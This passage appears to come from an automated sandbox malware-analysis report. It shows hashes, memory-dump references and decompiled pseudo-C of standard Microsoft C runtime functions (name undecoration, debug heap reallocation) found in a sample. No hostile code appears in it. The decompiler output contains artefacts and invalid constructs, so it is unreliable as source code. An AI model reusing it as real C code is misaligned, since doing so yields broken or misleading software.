                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ErrorFileLastModuleName
                      • String ID: $%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$InprocServer32$LocalServer32$MODULEGUID$MODULETYPE$Module$Module_Raw$pszModuleGUID != 0
                      • API String ID: 2776309574-3582396993
                      • Opcode ID: 3f34be121d65754223e981054bdbabf2c3ab4720d953009de7426256f44ac67d
                      • Instruction ID: d3a4334c86335241813f92c0102945d3425302c4f678c21c37cbf838b296570d
                      • Opcode Fuzzy Hash: 3f34be121d65754223e981054bdbabf2c3ab4720d953009de7426256f44ac67d
                      • Instruction Fuzzy Hash: 2AE12A76D042299FCB24EF94DC95FEEB7B4AF88304F0041A9E609A7251D7749E85CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00964C20 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 171COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00964C20(intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char* _v64;
				char _v68;
				char* _v72;
				char _v76;
				char* _v80;
				char _v84;
				char* _v88;
				char _v92;
				char* _v96;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char* _t62;
				intOrPtr _t66;
				intOrPtr _t75;
				char* _t91;
				char* _t92;
				char* _t97;
				intOrPtr _t104;
				signed int _t110;
				void* _t112;

				_t104 = __edx;
				_t62 =  *0xb30640; // 0x0
				if( *_t62 != 0) {
					E0095F3F0( &_v44);
					_t91 =  *0xb30640; // 0x0
					if( *_t91 != 0x57) {
						if(E009621A0(_t91) == 0 || E00962290() != 0) {
							_v20 = 0;
						} else {
							_v20 = 1;
						}
						_v24 = _v20;
					} else {
						_v24 = E009621A0(_t91);
					}
					if(_v24 == 0) {
						_t92 =  *0xb30640; // 0x0
						_v36 =  *_t92;
						_t66 =  *0xb30640; // 0x0
						 *0xb30640 = _t66 + 1;
						if(_v36 == 0x57) {
							E00964EA0( &_v132);
							_t112 = _t112 + 4;
						}
						goto L21;
					} else {
						E0095F3F0( &_v16);
						_t97 =  *0xb30640; // 0x0
						_v32 =  *_t97;
						_t75 =  *0xb30640; // 0x0
						 *0xb30640 = _t75 + 1;
						_v8 = _v32;
						_t110 = _v8 - 0x54;
						_v8 = _t110;
						if(_v8 > 5) {
							L18:
							E0095F820( &_v44,  &_v16);
							L21:
							E0095FD40( &_v44, E00964E80( &_v140));
							E0095F240(_a4,  &_v44);
							return _a4;
						}
						switch( *((intOrPtr*)(_v8 * 4 +  &M00964E5C))) {
							case 0:
								_t80 = E00960060("union ", 6);
								_t112 = _t112 + 8;
								_v60 = _t80;
								_v56 = _t110;
								E0095F7E0( &_v16,  &_v60);
								goto L18;
							case 1:
								_v68 = E00960060("struct ", 7);
								_v64 = __edx;
								__edx =  &_v68;
								__ecx =  &_v16;
								__eax = E0095F7E0(__ecx,  &_v68);
								goto L18;
							case 2:
								_v76 = E00960060("class ", 6);
								_v72 = __edx;
								__eax =  &_v76;
								__ecx =  &_v16;
								__eax = E0095F7E0(__ecx,  &_v76);
								goto L18;
							case 3:
								_v100 = E00960060("enum ", 5);
								_v96 = __edx;
								 &_v116 = E00964EA0( &_v116);
								__ecx =  &_v100;
								__edx =  &_v124;
								__eax = E0095FAA0( &_v124,  &_v100, __eax);
								__ecx =  &_v16;
								__eax = E0095F820(__ecx, __eax);
								goto L18;
							case 4:
								_v84 = E00960060("coclass ", 8);
								_v80 = __edx;
								__ecx =  &_v84;
								__ecx =  &_v16;
								__eax = E0095F7E0(__ecx,  &_v84);
								goto L18;
							case 5:
								_v92 = E00960060("cointerface ", 0xc);
								_v88 = __edx;
								__edx =  &_v92;
								__ecx =  &_v16;
								__eax = E0095F7E0(__ecx,  &_v92);
								goto L18;
						}
					}
				}
				_v52 = E00960060("`unknown ecsu\'", 0xe);
				_v48 = _t104;
				_v28 = E0095F1F0( &_v108,  &_v52);
				E0095FC30(_v28, _a4, 1);
				return _a4;
			}







































                      0x00964c20
                      0x00964c29
                      0x00964c33
                      0x00964c72
                      0x00964c77
                      0x00964c83
                      0x00964c96
                      0x00964caa
                      0x00964ca1
                      0x00964ca1
                      0x00964ca1
                      0x00964cb4
                      0x00964c85
                      0x00964c8a
                      0x00964c8a
                      0x00964cbb
                      0x00964e06
                      0x00964e0f
                      0x00964e12
                      0x00964e1a
                      0x00964e23
                      0x00964e29
                      0x00964e2e
                      0x00964e2e
                      0x00000000
                      0x00964cc1
                      0x00964cc4
                      0x00964cc9
                      0x00964cd2
                      0x00964cd5
                      0x00964cdd
                      0x00964ce5
                      0x00964ceb
                      0x00964cee
                      0x00964cf5
                      0x00964df8
                      0x00964dff
                      0x00964e31
                      0x00964e44
                      0x00964e50
                      0x00000000
                      0x00964e55
                      0x00964cfe
                      0x00000000
                      0x00964d0c
                      0x00964d11
                      0x00964d14
                      0x00964d17
                      0x00964d21
                      0x00000000
                      0x00000000
                      0x00964d3a
                      0x00964d3d
                      0x00964d40
                      0x00964d44
                      0x00964d47
                      0x00000000
                      0x00000000
                      0x00964d60
                      0x00964d63
                      0x00964d66
                      0x00964d6a
                      0x00964d6d
                      0x00000000
                      0x00000000
                      0x00964dcc
                      0x00964dcf
                      0x00964dd6
                      0x00964ddf
                      0x00964de3
                      0x00964de7
                      0x00964df0
                      0x00964df3
                      0x00000000
                      0x00000000
                      0x00964d86
                      0x00964d89
                      0x00964d8c
                      0x00964d90
                      0x00964d93
                      0x00000000
                      0x00000000
                      0x00964da9
                      0x00964dac
                      0x00964daf
                      0x00964db3
                      0x00964db6
                      0x00000000
                      0x00000000
                      0x00964cfe
                      0x00964cbb
                      0x00964c44
                      0x00964c47
                      0x00964c56
                      0x00964c62
                      0x00000000

                      APIs
                      • DName::operator+.LIBCMTD ref: 00964C62
                        • Part of subcall function 0095FC30: Mailbox.LIBCMTD ref: 0095FC40
                        • Part of subcall function 0095FC30: DName::operator+=.LIBCMTD ref: 0095FC4C
                        • Part of subcall function 0095FC30: Mailbox.LIBCMTD ref: 0095FC58
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00964C72
                      • UnDecorator::doEcsu.LIBCMTD ref: 00964C85
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00964CC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Iterator_baseIterator_base::_Mailboxstd::_$Decorator::doEcsuName::operator+Name::operator+=
                      • String ID: W$`unknown ecsu'$class $coclass $cointerface $enum $struct $union
                      • API String ID: 4208403871-962625158
                      • Opcode ID: bf0fec3c9eb6c1661185935a8241376e24b1ee29dffe927310137eced9fc3c23
                      • Instruction ID: ff932301ee422a295fc9baa03c92a653e1ddeceb36d6423514b6b9dc5b744805
                      • Opcode Fuzzy Hash: bf0fec3c9eb6c1661185935a8241376e24b1ee29dffe927310137eced9fc3c23
                      • Instruction Fuzzy Hash: 3D616EB1C44208DBDB04EFE4DCA2BEEBBB4BF94305F54812AE51677281EB356608CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00965060 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 167COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00965060(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _t51;
				intOrPtr _t61;
				char* _t63;
				intOrPtr _t66;
				intOrPtr _t81;
				intOrPtr* _t92;
				intOrPtr _t97;
				char* _t104;
				intOrPtr _t105;
				char* _t109;
				intOrPtr _t116;
				intOrPtr _t125;
				intOrPtr _t136;
				char* _t139;

				E0095F3F0( &_v20);
				_t51 =  *0xb30640; // 0x0
				 *0xb30640 = _t51 + 1;
				_t92 =  *0xb30640; // 0x0
				_v8 =  *_t92;
				if(_v8 == 0x41) {
					L4:
					if(_a16 == 0) {
						if( *_a8 == 2 ||  *_a8 == 3) {
							 *_a8 = 5;
						} else {
							if( *_a8 == 1) {
								 *_a8 = 4;
							}
						}
					}
					_t125 =  *0xb30640; // 0x0
					 *0xb30640 = _t125 + 1;
					L29:
					E0095F3F0(_a4);
					return _a4;
				}
				if(_v8 == 0x42) {
					if(_a16 == 0) {
						 *_a12 = 1;
						E0095F850( &_v20, 0x3e);
						_t97 =  *0xb30640; // 0x0
						 *0xb30640 = _t97 + 1;
						goto L29;
					}
					E0095F350(_a4, 2);
					return _a4;
				}
				if(_v8 == 0x43) {
					 *_a8 = 5;
					_t61 =  *0xb30640; // 0x0
					 *0xb30640 = _t61 + 1;
					goto L29;
				}
				_t63 =  *0xb30640; // 0x0
				if( *_t63 == 0) {
					L17:
					E0095F350(_a4, 1);
					return _a4;
				} else {
					_t66 =  *0xb30640; // 0x0
					if( *((char*)(_t66 + (1 << 0))) != 0) {
						if(_a16 == 0) {
							_t104 =  *0xb30640; // 0x0
							_t105 =  *0xb30640; // 0x0
							_t28 =  *((char*)(_t105 + (1 << 0))) - 0x30; // -95
							_v12 = ( *_t104 - 0x30 << 4) + _t28;
							_t136 =  *0xb30640; // 0x0
							 *0xb30640 = _t136 + 2;
							if(_v12 > 1) {
								E0095F850( &_v20, 0x2c);
								E0095F820( &_v20, E0095FB70( &_v20,  &_v36, E0095F510(__ebx,  &_v28, __edi, __esi, _v12, 0)));
							}
							E0095F820( &_v20, E0095FBB0( &_v20,  &_v44, 0x3e));
							_t109 =  *0xb30640; // 0x0
							if( *_t109 != 0x24) {
								E0095F820( &_v20, E0095FBB0( &_v20,  &_v52, 0x5e));
							} else {
								_t81 =  *0xb30640; // 0x0
								 *0xb30640 = _t81 + 1;
							}
							_t139 =  *0xb30640; // 0x0
							if( *_t139 == 0) {
								L0095FF10( &_v20, 1);
							} else {
								_t116 =  *0xb30640; // 0x0
								 *0xb30640 = _t116 + 1;
							}
							E0096AAA0( &_v20);
							E0095F240(_a4,  &_v20);
							return _a4;
						}
						E0095F350(_a4, 2);
						return _a4;
					}
					goto L17;
				}
				goto L4;
			}
























                      0x00965069
                      0x0096506e
                      0x00965076
                      0x0096507b
                      0x00965083
                      0x0096508a
                      0x009650a1
                      0x009650a5
                      0x009650ad
                      0x009650ba
                      0x009650c2
                      0x009650c8
                      0x009650cd
                      0x009650cd
                      0x009650c8
                      0x009650ad
                      0x009650d3
                      0x009650dc
                      0x00965293
                      0x00965296
                      0x00000000
                      0x0096529b
                      0x00965090
                      0x009650eb
                      0x00965102
                      0x0096510a
                      0x0096510f
                      0x00965118
                      0x00000000
                      0x00965118
                      0x009650f2
                      0x00000000
                      0x009650f7
                      0x00965096
                      0x00965126
                      0x0096512c
                      0x00965134
                      0x00000000
                      0x00965134
                      0x00965146
                      0x00965151
                      0x00965168
                      0x0096516d
                      0x00000000
                      0x00965153
                      0x0096515b
                      0x00965166
                      0x0096517e
                      0x0096519a
                      0x009651b2
                      0x009651bc
                      0x009651c0
                      0x009651c3
                      0x009651cc
                      0x009651d6
                      0x009651dd
                      0x00965202
                      0x00965202
                      0x00965219
                      0x0096521e
                      0x0096522a
                      0x0096524d
                      0x0096522c
                      0x0096522c
                      0x00965234
                      0x00965234
                      0x00965252
                      0x0096525d
                      0x00965275
                      0x0096525f
                      0x0096525f
                      0x00965268
                      0x00965268
                      0x0096527d
                      0x00965289
                      0x00000000
                      0x0096528e
                      0x00965185
                      0x00000000
                      0x0096518a
                      0x00000000
                      0x00965166
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965069
                      • DName::DName.LIBVCRUNTIMED ref: 009650F2
                      • DName::DName.LIBVCRUNTIMED ref: 0096516D
                      • DName::DName.LIBVCRUNTIMED ref: 00965185
                      • DName::DName.LIBVCRUNTIMED ref: 009651EC
                        • Part of subcall function 0095F510: __aullrem.LIBCMT ref: 0095F557
                        • Part of subcall function 0095F510: __aulldiv.LIBCMT ref: 0095F570
                      • DName::operator+.LIBCMTD ref: 009651F9
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB80
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB98
                      • Mailbox.LIBCMTD ref: 00965202
                      • DName::operator+.LIBCMTD ref: 00965210
                      • Mailbox.LIBCMTD ref: 00965219
                      • DName::operator+.LIBCMTD ref: 00965244
                        • Part of subcall function 0095FBB0: Mailbox.LIBCMTD ref: 0095FBC0
                        • Part of subcall function 0095FBB0: DName::operator+=.LIBCMTD ref: 0095FBCD
                        • Part of subcall function 0095FBB0: Mailbox.LIBCMTD ref: 0095FBD9
                      • Mailbox.LIBCMTD ref: 0096524D
                      • DName::operator+=.LIBCMTD ref: 00965275
                        • Part of subcall function 0095FF10: DName::isValid.LIBCMTD ref: 0095FF1A
                        • Part of subcall function 0095FF10: DName::isEmpty.LIBCMTD ref: 0095FF26
                        • Part of subcall function 0095FF10: DName::operator=.LIBVCRUNTIMED ref: 0095FF42
                      • DName::setIsComArray.LIBCMTD ref: 0096527D
                      • Mailbox.LIBCMTD ref: 00965289
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965296
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$NameName::$Name::operator+$Iterator_baseIterator_base::_Name::isName::operator+=std::_$ArrayEmptyName::operator=Name::setValid__aulldiv__aullrem
                      • String ID: C
                      • API String ID: 961569035-1037565863
                      • Opcode ID: 2b6e72b16a2d2ef91182e9358b7c343d45c9cb2ea8589bc7641ad56a2abeca6a
                      • Instruction ID: ee761736141c16bf313d9877f15f9e97301990b64930869c3b3ecfd6f3319728
                      • Opcode Fuzzy Hash: 2b6e72b16a2d2ef91182e9358b7c343d45c9cb2ea8589bc7641ad56a2abeca6a
                      • Instruction Fuzzy Hash: 8561BE70914915DFEB18EF14CCB2BBE7775FF81305F244069E81A5B2A9CB75AA44CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009625F0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 136COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009625F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr* _t53;
				void* _t57;
				void* _t75;
				intOrPtr _t86;
				intOrPtr* _t93;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t106;
				char _t108;

				_t53 =  *0xb30640; // 0x0
				_t85 =  *_t53;
				_v12 =  *_t53;
				if(_v12 == 0x58) {
					_t86 =  *0xb30640; // 0x0
					 *0xb30640 = _t86 + 1;
					_v60 = E00960060("void", 4);
					_v56 = _t103;
					E0095F1F0(_a4,  &_v60);
					return _a4;
				}
				_t122 = _v12 - 0x5a;
				if(_v12 == 0x5a) {
					L3:
					_t105 =  *0xb30640; // 0x0
					_t106 = _t105 + 1;
					 *0xb30640 = _t106;
					_t57 = E009621D0(_t85);
					__eflags = _t57;
					if(_t57 == 0) {
						_v52 = E00960060("<ellipsis>", 0xa);
						_v48 = _t106;
						_v16 =  &_v52;
					} else {
						_v44 = E00960060("...", 3);
						_v40 = _t106;
						_v16 =  &_v44;
					}
					_v24 = _v16;
					E0095F1F0(_a4, _v24);
					return _a4;
				}
				E009624A0(__ebx, __edi, __esi, _t122,  &_v36);
				if(E0096AB70( &_v36) != 0) {
					E0095F240(_a4,  &_v36);
					return _a4;
				} else {
					_t93 =  *0xb30640; // 0x0
					_t108 =  *_t93;
					_v8 = _t108;
					if(_v8 == 0) {
						E0095F240(_a4,  &_v36);
						return _a4;
					}
					if(_v8 == 0x40) {
						_t95 =  *0xb30640; // 0x0
						 *0xb30640 = _t95 + 1;
						E0095F240(_a4,  &_v36);
						return _a4;
					}
					if(_v8 == 0x5a) {
						_t98 =  *0xb30640; // 0x0
						 *0xb30640 = _t98 + 1;
						_t75 = E009621D0(_t98 + 1);
						__eflags = _t75;
						if(_t75 == 0) {
							_v76 = E00960060(",<ellipsis>", 0xb);
							_v72 = _t108;
							_v20 =  &_v76;
						} else {
							_v68 = E00960060(",...", 4);
							_v64 = _t108;
							_v20 =  &_v68;
						}
						_v28 = _v20;
						E0095FB30( &_v36, _a4, _v28);
						return _a4;
					}
					E0095F350(_a4, 2);
					return _a4;
				}
				goto L3;
			}































                      0x009625f6
                      0x009625fb
                      0x009625fd
                      0x00962604
                      0x0096267b
                      0x00962684
                      0x00962699
                      0x0096269c
                      0x009626a6
                      0x00000000
                      0x009626ab
                      0x00962606
                      0x0096260a
                      0x00962611
                      0x00962611
                      0x00962617
                      0x0096261a
                      0x00962620
                      0x00962625
                      0x00962627
                      0x00962655
                      0x00962658
                      0x0096265e
                      0x00962629
                      0x00962638
                      0x0096263b
                      0x00962641
                      0x00962641
                      0x00962664
                      0x0096266e
                      0x00000000
                      0x00962673
                      0x009626b7
                      0x009626c9
                      0x009627ac
                      0x00000000
                      0x009626cf
                      0x009626cf
                      0x009626d5
                      0x009626d7
                      0x009626de
                      0x009626fc
                      0x00000000
                      0x00962701
                      0x009626e4
                      0x00962774
                      0x0096277d
                      0x0096278a
                      0x00000000
                      0x0096278f
                      0x009626ee
                      0x00962709
                      0x00962712
                      0x00962718
                      0x0096271d
                      0x0096271f
                      0x0096274d
                      0x00962750
                      0x00962756
                      0x00962721
                      0x00962730
                      0x00962733
                      0x00962739
                      0x00962739
                      0x0096275c
                      0x0096276a
                      0x00000000
                      0x0096276f
                      0x00962799
                      0x00000000
                      0x0096279e
                      0x00000000

                      APIs
                      • UnDecorator::doEllipsis.LIBCMTD ref: 00962620
                      • UnDecorator::getArgumentList.LIBCMTD ref: 009626B7
                        • Part of subcall function 009624A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 009624B0
                        • Part of subcall function 009624A0: DName::operator+=.LIBCMTD ref: 009624FC
                        • Part of subcall function 009624A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00962561
                        • Part of subcall function 009624A0: Replicator::isFull.LIBCMTD ref: 00962587
                        • Part of subcall function 009624A0: Replicator::operator+=.LIBCMTD ref: 0096259A
                        • Part of subcall function 009624A0: DName::operator=.LIBVCRUNTIMED ref: 009625BB
                        • Part of subcall function 009624A0: DName::operator+=.LIBCMTD ref: 009625C7
                        • Part of subcall function 009624A0: Mailbox.LIBCMTD ref: 009625DA
                      • Mailbox.LIBCMTD ref: 009626FC
                      • UnDecorator::doEllipsis.LIBCMTD ref: 00962718
                      • DName::operator+.LIBCMTD ref: 0096276A
                      • Mailbox.LIBCMTD ref: 0096278A
                      • DName::DName.LIBVCRUNTIMED ref: 00962799
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • Mailbox.LIBCMTD ref: 009627AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Decorator::doEllipsisIterator_baseIterator_base::_NameName::operator+=std::_$ArgumentDecorator::getFullListName::Name::operator+Name::operator=Node::makeReplicator::isReplicator::operator+=Status
                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$Z$Z$void
                      • API String ID: 3869916097-1416550716
                      • Opcode ID: 4a80f005b4ce431ac35712c0dd8e4b7288c2ca10b2b43c9e5d06108be0fb97d4
                      • Instruction ID: 7c5026c35cbc3a465c120679e774ef0faba55c89992a012a91fd15890271f5f3
                      • Opcode Fuzzy Hash: 4a80f005b4ce431ac35712c0dd8e4b7288c2ca10b2b43c9e5d06108be0fb97d4
                      • Instruction Fuzzy Hash: D55164B4D44608EFDB04EF94DCA1BED7BB4BF84304F14806AE90967351D7746A44DB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00997560 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 449COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00997560(void* __edi, intOrPtr _a4, signed int* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				signed int _v5;
				void* _v6;
				signed int* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _t131;
				signed char _t132;
				signed int _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int* _t141;
				intOrPtr _t142;
				intOrPtr _t145;
				signed int* _t153;
				signed int _t157;
				void* _t158;
				void* _t160;
				void* _t162;
				intOrPtr _t169;
				signed int _t171;
				signed int* _t176;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t191;
				void* _t192;
				signed int _t195;
				signed int _t197;
				void* _t198;
				void* _t200;
				signed int _t209;
				signed int _t213;
				signed int _t221;
				intOrPtr _t232;
				intOrPtr _t234;
				signed int* _t253;
				signed int _t257;
				signed int _t259;
				intOrPtr _t272;
				signed int _t275;
				signed int _t276;
				void* _t288;
				void* _t289;
				void* _t290;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				void* _t295;

				_t288 = __edi;
				if(_a4 == 0) {
					return E00999580( *_a8, _a12, _a16, _a20);
				}
				__eflags = _a24 & 0x000000ff;
				if((_a24 & 0x000000ff) == 0) {
					L5:
					L00997AE0();
					_t131 =  *0xa06058; // 0x34
					_v24 = _t131;
					__eflags =  *0xa06060 - 0xffffffff;
					if( *0xa06060 != 0xffffffff) {
						__eflags = _v24 -  *0xa06060; // 0xffffffff
						if(__eflags == 0) {
							asm("int3");
						}
					}
					__eflags =  *0xa06244;
					if( *0xa06244 == 0) {
						L17:
						__eflags = _a12 - 1;
						if(_a12 == 1) {
							L27:
							_t132 = E00997360(_t207, _a4);
							_t290 = _t289 + 4;
							__eflags = _t132 & 0x000000ff;
							if(__eflags == 0) {
								L31:
								_t135 = L009980B0(_a4);
								_t291 = _t290 + 4;
								__eflags = _t135;
								if(__eflags == 0) {
									_t185 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x25c, 0, L"%ls", L"_CrtIsValidHeapPointer(block)");
									_t291 = _t291 + 0x18;
									__eflags = _t185 - 1;
									if(_t185 == 1) {
										asm("int3");
									}
								}
								_t136 = E00996E40(_a4);
								_t292 = _t291 + 4;
								_v16 = _t136;
								_t137 = _v16;
								__eflags =  *((intOrPtr*)(_t137 + 0x10)) - 3;
								if( *((intOrPtr*)(_t137 + 0x10)) != 3) {
									_v6 = 0;
								} else {
									_v6 = 1;
								}
								_v5 = _v6;
								__eflags = _v5 & 0x000000ff;
								if((_v5 & 0x000000ff) == 0) {
									_t209 =  *0xb306ec; // 0x334e
									__eflags = _t209 -  *((intOrPtr*)(_v16 + 0x14));
									if(__eflags >= 0) {
										goto L47;
									}
									_t180 = L009948E0(__eflags, 1, 0, 0, 0, "Error: possible heap corruption at or near 0x%p", _a4);
									__eflags = _t180 - 1;
									if(_t180 == 1) {
										asm("int3");
									}
									 *((intOrPtr*)(L00992F70(_t209))) = 0x16;
									return 0;
								} else {
									__eflags =  *((intOrPtr*)(_v16 + 0xc)) - 0xfedcbabc;
									if(__eflags != 0) {
										L40:
										_t184 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x263, 0, L"%ls", L"old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks");
										_t292 = _t292 + 0x18;
										__eflags = _t184 - 1;
										if(_t184 == 1) {
											asm("int3");
										}
										L42:
										L47:
										_t210 = _a8;
										__eflags =  *_a8 - 0xffffffbc;
										if( *_a8 <= 0xffffffbc) {
											_v32 =  *_a8 + 0x24;
											_v12 = 0;
											_t211 = _a24 & 0x000000ff;
											__eflags = _a24 & 0x000000ff;
											if((_a24 & 0x000000ff) == 0) {
												_t141 = E009ACA20(_v32, _v16, _v32);
												_t293 = _t292 + 8;
												_v12 = _t141;
												__eflags = _v12;
												if(_v12 != 0) {
													L55:
													_t142 =  *0xa06058; // 0x34
													 *0xa06058 = _t142 + 1;
													_t213 = _v5 & 0x000000ff;
													__eflags = _t213;
													if(_t213 == 0) {
														__eflags =  *0xb306ec - 0xffffffff;
														if( *0xb306ec < 0xffffffff) {
															_t171 =  *0xb306ec; // 0x334e
															 *0xb306ec = _t171 - _v12[5];
															__eflags = (_t213 | 0xffffffff) -  *0xb306ec -  *_a8;
															if((_t213 | 0xffffffff) -  *0xb306ec <=  *_a8) {
																_v36 = 0xffffffff;
															} else {
																_v36 =  *_a8;
															}
															_t275 =  *0xb306ec; // 0x334e
															_t276 = _t275 + _v36;
															__eflags = _t276;
															 *0xb306ec = _t276;
														}
														_t232 =  *0xb306f0; // 0x2309
														 *0xb306f0 = _t232 - _v12[5];
														_t169 =  *0xb306f0; // 0x2309
														 *0xb306f0 = _t169 +  *_a8;
														_t234 =  *0xb306f0; // 0x2309
														__eflags = _t234 -  *0xb306f4; // 0x2309
														if(__eflags > 0) {
															_t272 =  *0xb306f0; // 0x2309
															 *0xb306f4 = _t272;
														}
													}
													_t145 = E00996370(_v12);
													_t294 = _t293 + 4;
													_v20 = _t145;
													_t253 = _v12;
													__eflags =  *_a8 -  *((intOrPtr*)(_t253 + 0x14));
													if( *_a8 >  *((intOrPtr*)(_t253 + 0x14))) {
														__eflags = _v20 + _v12[5];
